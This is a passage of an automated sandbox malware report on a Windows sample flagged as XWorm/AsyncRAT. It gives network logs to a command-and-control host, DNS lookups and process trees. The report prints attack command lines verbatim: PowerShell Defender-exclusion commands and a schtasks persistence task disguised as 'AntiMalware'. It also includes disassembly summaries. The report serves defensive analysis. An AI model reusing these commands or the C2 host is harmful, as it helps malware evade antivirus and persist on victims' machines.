                                                                      Dec 20, 2024 18:59:54.708357096 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.708431005 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:54.713304996 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.713577986 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.713644981 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:54.716192007 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.716882944 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.716943026 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:54.716984034 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.722891092 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.722944021 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.722944975 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:54.727421045 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.727475882 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.727483988 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:54.733189106 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.733251095 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:54.733347893 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.739228964 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.739305973 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:54.739373922 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.745074987 CET1354849764147.185.221.24192.168.2.4
                                                                      Dec 20, 2024 18:59:54.745126009 CET4976413548192.168.2.4147.185.221.24
                                                                      Dec 20, 2024 18:59:54.745265007 CET1354849764147.185.221.24192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Dec 20, 2024 18:58:03.970284939 CET5720053192.168.2.41.1.1.1
                                                                      Dec 20, 2024 18:58:04.108186007 CET53572001.1.1.1192.168.2.4
                                                                      Dec 20, 2024 18:59:12.507483006 CET5309053192.168.2.41.1.1.1
                                                                      Dec 20, 2024 18:59:12.764097929 CET53530901.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Dec 20, 2024 18:58:03.970284939 CET192.168.2.41.1.1.10xabf9Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                      Dec 20, 2024 18:59:12.507483006 CET192.168.2.41.1.1.10x9bc6Standard query (0)analysis-warming.gl.at.ply.ggA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Dec 20, 2024 18:58:04.108186007 CET1.1.1.1192.168.2.40xabf9No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                      Dec 20, 2024 18:59:12.764097929 CET1.1.1.1192.168.2.40x9bc6No error (0)analysis-warming.gl.at.ply.gg147.185.221.24A (IP address)IN (0x0001)false

                                                                      HTTP Request Dependency Graph

                                                                      • ip-api.com

                                                                      HTTP Packets

                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449730208.95.112.1807356C:\Users\user\Desktop\KJhsNv2RcI.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 20, 2024 18:58:04.236344099 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                      Host: ip-api.com
                                                                      Connection: Keep-Alive
                                                                      Dec 20, 2024 18:58:05.389503956 CET175INHTTP/1.1 200 OK
                                                                      Date: Fri, 20 Dec 2024 17:58:04 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 6
                                                                      Access-Control-Allow-Origin: *
                                                                      X-Ttl: 60
                                                                      X-Rl: 44
                                                                      Data Raw: 66 61 6c 73 65 0a
                                                                      Data Ascii: false


                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Target ID:0
                                                                      Start time:12:57:58
                                                                      Start date:20/12/2024
                                                                      Path:C:\Users\user\Desktop\KJhsNv2RcI.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\Desktop\KJhsNv2RcI.exe"
                                                                      Imagebase:0xe70000
                                                                      File size:70'144 bytes
                                                                      MD5 hash:88EF3BC08129685BF8A1A238487B60EC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2822437837.000000000334A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2822437837.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: 00000000.00000002.2821186755.00000000015F0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1669945553.0000000000E72000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1669945553.0000000000E72000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                      Reputation:low
                                                                      Has exited:false

                                                                      General

                                                                      Target ID:1
                                                                      Start time:12:58:04
                                                                      Start date:20/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KJhsNv2RcI.exe'
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:2
                                                                      Start time:12:58:04
                                                                      Start date:20/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:4
                                                                      Start time:12:58:11
                                                                      Start date:20/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'KJhsNv2RcI.exe'
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:5
                                                                      Start time:12:58:11
                                                                      Start date:20/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:9
                                                                      Start time:12:58:22
                                                                      Start date:20/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\AntiMalware.exe'
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:10
                                                                      Start time:12:58:22
                                                                      Start date:20/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:11
                                                                      Start time:12:58:39
                                                                      Start date:20/12/2024
                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AntiMalware.exe'
                                                                      Imagebase:0x7ff788560000
                                                                      File size:452'608 bytes
                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:12
                                                                      Start time:12:58:39
                                                                      Start date:20/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:13
                                                                      Start time:12:59:10
                                                                      Start date:20/12/2024
                                                                      Path:C:\Windows\System32\schtasks.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AntiMalware" /tr "C:\Users\user\AppData\Roaming\AntiMalware.exe"
                                                                      Imagebase:0x7ff76f990000
                                                                      File size:235'008 bytes
                                                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:14
                                                                      Start time:12:59:10
                                                                      Start date:20/12/2024
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:15
                                                                      Start time:12:59:10
                                                                      Start date:20/12/2024
                                                                      Path:C:\Users\user\AppData\Roaming\AntiMalware.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Users\user\AppData\Roaming\AntiMalware.exe
                                                                      Imagebase:0xe90000
                                                                      File size:70'144 bytes
                                                                      MD5 hash:88EF3BC08129685BF8A1A238487B60EC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, Author: Joe Security
                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, Author: Joe Security
                                                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\AntiMalware.exe, Author: ditekSHen
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Avira
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 84%, ReversingLabs
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:17
                                                                      Start time:12:59:22
                                                                      Start date:20/12/2024
                                                                      Path:C:\Users\user\AppData\Roaming\AntiMalware.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\AppData\Roaming\AntiMalware.exe"
                                                                      Imagebase:0x7d0000
                                                                      File size:70'144 bytes
                                                                      MD5 hash:88EF3BC08129685BF8A1A238487B60EC
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      General

                                                                      Target ID:18
                                                                      Start time:12:59:30
                                                                      Start date:20/12/2024
                                                                      Path:C:\Users\user\AppData\Roaming\AntiMalware.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\AppData\Roaming\AntiMalware.exe"
                                                                      Imagebase:0x280000
                                                                      File size:70'144 bytes
                                                                      MD5 hash:88EF3BC08129685BF8A1A238487B60EC
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Has exited:true

                                                                      Disassembly

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:14.7%
                                                                        Dynamic/Decrypted Code Coverage:80%
                                                                        Signature Coverage:60%
                                                                        Total number of Nodes:15
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 13118 7ffd9ba653d4 13119 7ffd9ba653dd NtRaiseHardError 13118->13119 13121 7ffd9ba654bd 13119->13121 13106 7ffd9b7f79e1 13107 7ffd9b7f7a2e CheckRemoteDebuggerPresent 13106->13107 13109 7ffd9b7f7a9f 13107->13109 13114 7ffd9ba642fc 13115 7ffd9ba64305 CreateDesktopA 13114->13115 13117 7ffd9ba6448f 13115->13117 13122 7ffd9ba652d5 13123 7ffd9ba652ef RtlAdjustPrivilege 13122->13123 13125 7ffd9ba6539c 13123->13125 13110 7ffd9b7f916d 13111 7ffd9b7f91d0 RtlSetProcessIsCritical 13110->13111 13113 7ffd9b7f9252 13111->13113

                                                                        Executed Functions

                                                                        Function 00007FFD9B7FC484 Relevance: 2.2, Strings: 1, Instructions: 989COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 7ffd9b7fc484-7ffd9b7fc4d5 call 7ffd9b7f0a00 6 7ffd9b7fc54b 0->6 7 7ffd9b7fc4d7-7ffd9b7fc4f4 0->7 8 7ffd9b7fc550-7ffd9b7fc565 6->8 7->8 10 7ffd9b7fc4f6-7ffd9b7fc546 call 7ffd9b7fb390 7->10 12 7ffd9b7fc567-7ffd9b7fc57e call 7ffd9b7f11e8 call 7ffd9b7f0a10 8->12 13 7ffd9b7fc583-7ffd9b7fc598 8->13 34 7ffd9b7fd0ff-7ffd9b7fd10d 10->34 12->34 20 7ffd9b7fc59a-7ffd9b7fc5ca call 7ffd9b7f11e8 13->20 21 7ffd9b7fc5cf-7ffd9b7fc5e4 13->21 20->34 29 7ffd9b7fc5f7-7ffd9b7fc60c 21->29 30 7ffd9b7fc5e6-7ffd9b7fc5f2 call 7ffd9b7fad58 21->30 38 7ffd9b7fc652-7ffd9b7fc667 29->38 39 7ffd9b7fc60e-7ffd9b7fc611 29->39 30->34 45 7ffd9b7fc669-7ffd9b7fc66c 38->45 46 7ffd9b7fc6a8-7ffd9b7fc6bd 38->46 39->6 41 7ffd9b7fc617-7ffd9b7fc622 39->41 41->6 42 7ffd9b7fc628-7ffd9b7fc64d call 7ffd9b7f09e8 call 7ffd9b7fad58 41->42 42->34 45->6 48 7ffd9b7fc672-7ffd9b7fc67d 45->48 53 7ffd9b7fc6ea-7ffd9b7fc6ff 46->53 54 7ffd9b7fc6bf-7ffd9b7fc6c2 46->54 48->6 51 7ffd9b7fc683-7ffd9b7fc6a3 call 7ffd9b7f09e8 call 7ffd9b7f9e90 48->51 51->34 62 7ffd9b7fc7d7-7ffd9b7fc7ec 53->62 63 7ffd9b7fc705-7ffd9b7fc751 call 7ffd9b7f0970 53->63 54->6 57 7ffd9b7fc6c8-7ffd9b7fc6e5 call 7ffd9b7f09e8 call 7ffd9b7f9e98 54->57 57->34 71 7ffd9b7fc80b-7ffd9b7fc80c 62->71 72 7ffd9b7fc7ee-7ffd9b7fc7f1 62->72 63->6 96 7ffd9b7fc757-7ffd9b7fc78f call 7ffd9b7f7640 63->96 77 7ffd9b7fc812-7ffd9b7fc820 71->77 72->6 75 7ffd9b7fc7f7-7ffd9b7fc806 call 7ffd9b7f9e70 72->75 75->34 82 7ffd9b7fc842-7ffd9b7fc857 77->82 83 7ffd9b7fc822-7ffd9b7fc825 77->83 89 7ffd9b7fc859-7ffd9b7fc872 82->89 90 7ffd9b7fc877-7ffd9b7fc88c 82->90 83->6 85 7ffd9b7fc82b-7ffd9b7fc83d call 7ffd9b7f9e70 83->85 85->34 89->34 97 7ffd9b7fc8ac-7ffd9b7fc8c1 90->97 98 7ffd9b7fc88e-7ffd9b7fc8a7 90->98 96->6 113 7ffd9b7fc795-7ffd9b7fc7b3 call 7ffd9b7fad88 96->113 102 7ffd9b7fc8c3-7ffd9b7fc8dc 97->102 103 7ffd9b7fc8e1-7ffd9b7fc8f6 97->103 98->34 102->34 108 7ffd9b7fc8f8-7ffd9b7fc8fb 103->108 109 7ffd9b7fc91f-7ffd9b7fc934 103->109 108->6 111 7ffd9b7fc901-7ffd9b7fc91a 108->111 117 7ffd9b7fc93a-7ffd9b7fc9b2 109->117 118 7ffd9b7fc9d4-7ffd9b7fc9e9 109->118 111->34 113->77 124 7ffd9b7fc7b5-7ffd9b7fc7d2 113->124 117->6 146 7ffd9b7fc9b8-7ffd9b7fc9cf 117->146 125 7ffd9b7fc9eb-7ffd9b7fc9fc 118->125 126 7ffd9b7fca01-7ffd9b7fca16 118->126 124->34 125->34 132 7ffd9b7fca1c-7ffd9b7fca94 126->132 133 7ffd9b7fcab6-7ffd9b7fcacb 126->133 132->6 163 7ffd9b7fca9a-7ffd9b7fcab1 132->163 139 7ffd9b7fcae3-7ffd9b7fcaf8 133->139 140 7ffd9b7fcacd-7ffd9b7fcade 133->140 148 7ffd9b7fcb2a-7ffd9b7fcb3f 139->148 149 7ffd9b7fcafa-7ffd9b7fcb25 call 7ffd9b7f0d00 call 7ffd9b7fb390 139->149 140->34 146->34 155 7ffd9b7fcc1c-7ffd9b7fcc31 148->155 156 7ffd9b7fcb45-7ffd9b7fcc17 call 7ffd9b7f0d00 call 7ffd9b7fb390 148->156 149->34 165 7ffd9b7fccf8-7ffd9b7fcd0d 155->165 166 7ffd9b7fcc37-7ffd9b7fcc3a 155->166 156->34 163->34 175 7ffd9b7fcd21-7ffd9b7fcd36 165->175 176 7ffd9b7fcd0f-7ffd9b7fcd1c call 7ffd9b7fb390 165->176 167 7ffd9b7fcc40-7ffd9b7fcc4b 166->167 168 7ffd9b7fcced-7ffd9b7fccf2 166->168 167->168 172 7ffd9b7fcc51-7ffd9b7fcceb call 7ffd9b7f0d00 call 7ffd9b7fb390 167->172 177 7ffd9b7fccf3 168->177 172->177 185 7ffd9b7fcd38-7ffd9b7fcd49 175->185 186 7ffd9b7fcdad-7ffd9b7fcdc2 175->186 176->34 177->34 185->6 191 7ffd9b7fcd4f-7ffd9b7fcd57 call 7ffd9b7f09e0 185->191 193 7ffd9b7fcdc4-7ffd9b7fcdc7 186->193 194 7ffd9b7fce02-7ffd9b7fce17 186->194 199 7ffd9b7fcd5c-7ffd9b7fcd5f 191->199 193->6 197 7ffd9b7fcdcd-7ffd9b7fcdf8 call 7ffd9b7f09d8 call 7ffd9b7f09e8 call 7ffd9b7f9e48 193->197 207 7ffd9b7fce19-7ffd9b7fce58 call 7ffd9b7f8eb0 call 7ffd9b7fb8b0 call 7ffd9b7f9e50 194->207 208 7ffd9b7fce5d-7ffd9b7fce72 194->208 239 7ffd9b7fcdfd 197->239 202 7ffd9b7fcd8b-7ffd9b7fcda8 call 7ffd9b7f09e0 call 7ffd9b7f09e8 call 7ffd9b7f9e48 199->202 203 7ffd9b7fcd61-7ffd9b7fcd86 call 7ffd9b7fb390 199->203 202->34 203->34 207->34 223 7ffd9b7fce86-7ffd9b7fce9b 208->223 224 7ffd9b7fce74-7ffd9b7fce81 call 7ffd9b7f9e58 208->224 223->34 237 7ffd9b7fcea1-7ffd9b7fcea8 223->237 224->34 242 7ffd9b7fcebb-7ffd9b7fcf60 call 7ffd9b7fada8 call 7ffd9b7fadb8 call 7ffd9b7fadc8 call 7ffd9b7fadd8 237->242 243 7ffd9b7fceaa-7ffd9b7fceb4 call 7ffd9b7fad98 237->243 239->34 242->34 243->242
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2890245401.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b7f0000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 9cb061715d391085c631be6eafe4f755c272a148c0e196ed75282d8a9a4d1b2a
                                                                        • Instruction ID: ec56b032cd33cd1e5f50cae660958490bbbef9708ffff46a3eaf85827d286676
                                                                        • Opcode Fuzzy Hash: 9cb061715d391085c631be6eafe4f755c272a148c0e196ed75282d8a9a4d1b2a
                                                                        • Instruction Fuzzy Hash: 95627430B1DA0E4BEB64FB7884A5AB977D2FF94314F514679D01EC32E6DD28E8028785
                                                                        Function 00007FFD9B7F16D9 Relevance: 2.0, Strings: 1, Instructions: 753COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 270 7ffd9b7f16d9-7ffd9b7f1710 271 7ffd9b7f1ee6-7ffd9b7f1f2d 270->271 272 7ffd9b7f1716-7ffd9b7f1845 call 7ffd9b7f0620 * 8 call 7ffd9b7f0a08 270->272 313 7ffd9b7f1847-7ffd9b7f184e 272->313 314 7ffd9b7f184f-7ffd9b7f18c6 call 7ffd9b7f04b8 call 7ffd9b7f04b0 call 7ffd9b7f0348 call 7ffd9b7f0358 272->314 313->314 329 7ffd9b7f18d9-7ffd9b7f18e9 314->329 330 7ffd9b7f18c8-7ffd9b7f18d2 314->330 333 7ffd9b7f18eb-7ffd9b7f190a call 7ffd9b7f0348 329->333 334 7ffd9b7f1911-7ffd9b7f1931 329->334 330->329 333->334 340 7ffd9b7f1933-7ffd9b7f193d call 7ffd9b7f0368 334->340 341 7ffd9b7f1942-7ffd9b7f19a6 call 7ffd9b7f0ff8 334->341 340->341 351 7ffd9b7f19ac-7ffd9b7f1a41 341->351 352 7ffd9b7f1a46-7ffd9b7f1ad4 341->352 372 7ffd9b7f1adb-7ffd9b7f1c19 call 7ffd9b7f0870 call 7ffd9b7f0858 call 7ffd9b7f0378 call 7ffd9b7f0388 351->372 352->372 395 7ffd9b7f1c1b-7ffd9b7f1c4e 372->395 396 7ffd9b7f1c67-7ffd9b7f1c9a 372->396 395->396 403 7ffd9b7f1c50-7ffd9b7f1c5d 395->403 406 7ffd9b7f1c9c-7ffd9b7f1cbd 396->406 407 7ffd9b7f1cbf-7ffd9b7f1cef 396->407 403->396 408 7ffd9b7f1c5f-7ffd9b7f1c65 403->408 411 7ffd9b7f1cf7-7ffd9b7f1d2e 406->411 407->411 408->396 416 7ffd9b7f1d53-7ffd9b7f1d83 411->416 417 7ffd9b7f1d30-7ffd9b7f1d51 411->417 419 7ffd9b7f1d8b-7ffd9b7f1df7 call 7ffd9b7f0398 416->419 417->419 425 7ffd9b7f1dfd-7ffd9b7f1e14 call 7ffd9b7f09a8 call 7ffd9b7f0ff8 419->425 431 7ffd9b7f1e1b-7ffd9b7f1e5a 425->431 432 7ffd9b7f1e16 call 7ffd9b7f11e0 425->432 431->425 438 7ffd9b7f1e5c-7ffd9b7f1eb4 431->438 432->431
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2890245401.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9b7f0000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: SAM_^
                                                                        • API String ID: 0-3658645246
                                                                        • Opcode ID: e67e0ef2e9edda096c89c940e56c655c465e9eb103530d02a9c89b6fb66feb3e
                                                                        • Instruction ID: c32d05fc5074be7e91b5a0004df8712d9a60881c35ea7c29b95364ff7dae148f
                                                                        • Opcode Fuzzy Hash: e67e0ef2e9edda096c89c940e56c655c465e9eb103530d02a9c89b6fb66feb3e
                                                                        • Instruction Fuzzy Hash: 51329624B19A4D4FE758FB7888796BD77D2EFD8704F4105B9E00DC32E6DD28A8418785
                                                                        Function 00007FFD9BA642FC Relevance: 1.7, APIs: 1, Instructions: 216COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 444 7ffd9ba642fc-7ffd9ba64303 445 7ffd9ba6430e-7ffd9ba643a8 444->445 446 7ffd9ba64305-7ffd9ba6430d 444->446 450 7ffd9ba64403-7ffd9ba6448d CreateDesktopA 445->450 451 7ffd9ba643aa-7ffd9ba643b9 445->451 446->445 458 7ffd9ba6448f 450->458 459 7ffd9ba64495-7ffd9ba644c9 call 7ffd9ba644e5 450->459 451->450 452 7ffd9ba643bb-7ffd9ba643be 451->452 453 7ffd9ba643c0-7ffd9ba643d3 452->453 454 7ffd9ba643f8-7ffd9ba64400 452->454 456 7ffd9ba643d5 453->456 457 7ffd9ba643d7-7ffd9ba643ea 453->457 454->450 456->457 457->457 460 7ffd9ba643ec-7ffd9ba643f4 457->460 458->459 463 7ffd9ba644d0-7ffd9ba644e4 459->463 464 7ffd9ba644cb 459->464 460->454 464->463
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2912954338.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9ba60000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDesktop
                                                                        • String ID:
                                                                        • API String ID: 3054513912-0
                                                                        • Opcode ID: eaf9c2f6a2a237fe669914fe364e019e7fa18d79a8bae2f7aef3de276c139a59
                                                                        • Instruction ID: 50855de55395d9f7d29c83a3372c3cc55200f9bf1e95d164814caabcade3f70a
                                                                        • Opcode Fuzzy Hash: eaf9c2f6a2a237fe669914fe364e019e7fa18d79a8bae2f7aef3de276c139a59
                                                                        • Instruction Fuzzy Hash: 6461F970918A8D8FDB68EF1CC8567E477E1FB59311F11426EE84DC3251CE74E8418B81
                                                                        Function 00007FFD9BA653D4 Relevance: 1.6, APIs: 1, Instructions: 133nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 471 7ffd9ba653d4-7ffd9ba653db 472 7ffd9ba653dd-7ffd9ba653e5 471->472 473 7ffd9ba653e6-7ffd9ba654bb NtRaiseHardError 471->473 472->473 477 7ffd9ba654c3-7ffd9ba654e2 473->477 478 7ffd9ba654bd 473->478 478->477
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2912954338.00007FFD9BA60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA60000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ffd9ba60000_KJhsNv2RcI.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorHardRaise
                                                                        • String ID:
                                                                        • API String ID: 435474256-0
                                                                        • Opcode ID: f635b446d5f1db226d68d5488091678d229a77a05716e0135113acc52306f82c
                                                                        • Instruction ID: 59f666f254cfcfad607d213bc4b2802185ce7a191d76d2c96e6fa7fe9cd4f655
